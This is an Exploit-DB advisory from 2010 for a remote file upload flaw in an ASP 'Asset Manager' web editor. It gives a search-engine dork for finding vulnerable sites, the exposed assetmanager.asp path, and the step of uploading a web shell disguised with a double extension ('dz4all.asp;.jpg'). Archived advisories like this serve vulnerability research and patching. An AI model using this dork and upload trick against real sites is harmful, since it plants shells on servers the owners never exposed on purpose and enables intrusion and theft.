Asset Manager - Arbitrary File Upload

EDB-ID:

12693

CVE:

N/A


Author:

Ra3cH

Type:

webapps


Platform:

ASP

Date:

2010-05-22


************************************************************
** 	 Asset Manager Remote File upload Vulnerability
**
************************************************************
**  Prodcut:		Asset Manager   
**  Home   : 		N/A
**  Vunlerability :		Remote File upload
**  Risk  :		High
**  Dork : 		inurl:Editor/assetmanager/assetmanager.asp
************************************************************
** Discovred by:	Ra3cH
** From	       :	Algeria
** Contact     : 	e51@hotmail.fr
** *********************************************************
************************************************************
**  Exploit:
**  http://[PATH]/assetmanager/assetmanager.asp
**  
**
**  and upload your shell .... dz4all.asp;.jpg 
**  
************************************************************
**
**
**
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & 
***********************************************************